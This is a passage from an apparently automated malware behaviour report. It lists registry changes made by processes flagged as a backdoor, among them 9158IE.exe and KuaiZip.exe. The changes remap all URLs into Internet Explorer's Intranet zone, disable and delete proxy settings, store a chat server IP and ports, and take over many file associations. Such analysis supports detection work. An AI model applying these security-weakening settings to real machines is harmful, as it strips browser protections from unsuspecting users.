"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\9158web\120025]
"VideoPort" = "40115"

"AudioPort" = "60010"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\9158web\120025]
"RoomPass" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158web\120025]
"RoomType" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "9158IE.exe"

[HKLM\SOFTWARE\9158web\120025]
"KTVPort" = "9999"

[HKLM\SOFTWARE\Microsoft\Direct3D\MostRecentApplication]
"Name" = "9158IE.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\9158web\120025]
"TRANSIP" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\9158web\120025]
"Port" = "30115"

"RoomDesp" = ""
"USERPWD" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1439785405"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 05 39 55 8F 98 70 34 30 86 6F 65 9E 84 57 93"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Cache" = "A8 03 00 00 05 00 00 00 E3 04 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\9158web\120025]
"ServerTypeName" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158web\120025]
"CommandType" = "35"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\9158web\120025]
"ServerType" = "CLASS_EPH_PTS_CHAT_3/25/2004 9:57"
"RoomName" = "????"
"ServerIP" = "60.191.222.218"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158IE.exe:2864 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C1 1C A9 ED 0B 94 14 D7 74 0F BC 56 37 D5 D4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process YouQian_Setup.exe:2228 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 0C EF 6F 26 E2 77 8D 0F 96 39 B7 B0 04 C0 4C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process MM-liao9728.exe:1888 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015101420151015]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015101420151015\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015101420151015]
"CachePrefix" = ":2015101420151015:"
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao9728.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv097_28.exe" = "9158chat2_ktv097_28"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015101420151015]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 19 A4 F2 39 D9 8C 40 EA A2 D1 E4 91 82 B4 1E"

[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015101420151015]
"CacheOptions" = "11"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process KuaiZip.exe:1140 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCR\KuaiZip_FileAsso.Origin\.002]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.004]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.087]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.027]
"(Default)" = "快压 027 压缩文件"

[HKCR\KuaiZip.gz\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.004\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.039]
"(Default)" = "KuaiZip.039"

[HKCR\KuaiZip.081\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.074\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.061]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.013]
"set" = "1"

[HKCR\KuaiZip.025]
"(Default)" = "快压 025 压缩文件"

[HKCR\KuaiZip.083\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.051]
"(Default)" = "KuaiZip.051"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.057]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.082]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\KuaiZip_FileAsso.Origin\.098]
"(Default)" = "NoAssociate.KZ"

[HKCR\.017]
"(Default)" = "KuaiZip.017"

[HKCR\.021]
"(Default)" = "KuaiZip.021"

[HKCR\KuaiZip.mou\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.06\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.095]
"(Default)" = "NoAssociate.KZ"

[HKCR\.061]
"(Default)" = "KuaiZip.061"

[HKCR\.001]
"(Default)" = "KuaiZip.001"

[HKCR\KuaiZip.038\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.040\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.086]
"(Default)" = "KuaiZip.086"

[HKCR\KuaiZip_FileAsso.Origin\.03]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.055]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.059]
"set" = "1"

[HKCR\.031]
"(Default)" = "KuaiZip.031"

[HKCR\KuaiZip_FileAsso.Origin\.021]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.014]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.086]
"set" = "1"

[HKCR\KuaiZip.kz]
"(Default)" = "快压 KZ 压缩文件"

[HKCR\KuaiZip.096]
"(Default)" = "快压 096 压缩文件"

[HKCR\KuaiZip.066\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.069]
"(Default)" = "快压 069 压缩文件"

[HKCR\.097]
"(Default)" = "KuaiZip.097"

[HKCR\KuaiZip.047]
"(Default)" = "快压 047 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.arj]
"set" = "1"

[HKCR\KuaiZip.zip\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,2"

[HKCR\KuaiZip.026\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.z\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.tar]
"(Default)" = "KuaiZip.tar"

[HKCR\.007]
"(Default)" = "KuaiZip.007"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.037]
"set" = "1"

[HKCR\.067]
"(Default)" = "KuaiZip.067"

[HKCR\KuaiZip.bz2\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.035\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.08]
"(Default)" = "快压 08 压缩文件"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.03]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.tar]
"set" = "1"

[HKCR\KuaiZip.rpm\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.059]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.052\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.03\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.071\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.025]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.bz2]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.050]
"set" = "1"

[HKCR\KuaiZip.011\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.060]
"(Default)" = "KuaiZip.060"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.z]
"set" = "1"

[HKCR\KuaiZip.041\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.012\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.028\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.010]
"(Default)" = "KuaiZip.010"

[HKCR\KuaiZip.073]
"(Default)" = "快压 073 压缩文件"

[HKCR\.047]
"(Default)" = "KuaiZip.047"

[HKCR\KuaiZip.028\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.016\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.038\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.046\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.066]
"(Default)" = "KuaiZip.066"

[HKCR\.07]
"(Default)" = "KuaiZip.07"

[HKCR\.076]
"(Default)" = "KuaiZip.076"

[HKCR\.090]
"(Default)" = "KuaiZip.090"

[HKCR\KuaiZip_FileAsso.Origin\.018]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.09]
"(Default)" = "快压 09 压缩文件"

[HKCR\KuaiZip.014]
"(Default)" = "快压 014 压缩文件"

[HKCR\KuaiZip.kz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,1"

[HKCR\KuaiZip_FileAsso.Origin\.028]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.gzip]
"(Default)" = "快压 GZIP 压缩文件"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.mou]
"set" = "1"

[HKCR\KuaiZip.058\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.076]
"(Default)" = "快压 076 压缩文件"

[HKCR\KuaiZip.085\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\.089]
"(Default)" = "KuaiZip.089"

[HKCR\KuaiZip.099]
"(Default)" = "快压 099 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.092]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.079\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.034\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.035]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.061\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.038]
"(Default)" = "NoAssociate.KZ"

[HKCR\.041]
"(Default)" = "KuaiZip.041"

[HKCR\KuaiZip.090\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.089]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.043\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.01]
"(Default)" = "快压 01 压缩文件"

[HKCR\.092]
"(Default)" = "KuaiZip.092"

[HKCR\KuaiZip_FileAsso.Origin\.073]
"(Default)" = "NoAssociate.KZ"

[HKCR\.09]
"(Default)" = "KuaiZip.09"

[HKCR\KuaiZip_FileAsso.Origin\.052]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.057\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.011]
"(Default)" = "快压 011 压缩文件"

[HKCR\KuaiZip.045]
"(Default)" = "快压 045 压缩文件"

[HKCR\.085]
"(Default)" = "KuaiZip.085"

[HKCR\KuaiZip.011\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.094]
"(Default)" = "KuaiZip.094"

[HKCR\KuaiZip.075\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.03]
"(Default)" = "快压 03 压缩文件"

[HKCR\KuaiZip_FileAsso.Origin\.012]
"(Default)" = "NoAssociate.KZ"

[HKCR\.cab]
"(Default)" = "KuaiZip.cab"

[HKCR\KuaiZip.019\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.046]
"(Default)" = "KuaiZip.046"

[HKCR\KuaiZip_FileAsso.Origin\.tgz]
"(Default)" = ""

[HKCR\.z]
"(Default)" = "KuaiZip.z"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.083]
"set" = "1"

[HKCR\KuaiZip.033\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.094\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.087\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.008]
"set" = "1"

[HKCR\KuaiZip_FileAsso.Origin\.05]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.020\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.079]
"(Default)" = "KuaiZip.079"

[HKCR\KuaiZip.032\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\.040]
"(Default)" = "KuaiZip.040"

[HKCR\KuaiZip.091\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.042]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.tgz\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.099]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.064]
"(Default)" = "快压 064 压缩文件"

[HKCR\KuaiZip.009\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.093]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.04]
"set" = "1"

[HKCR\KuaiZip.037\shell\open\command]
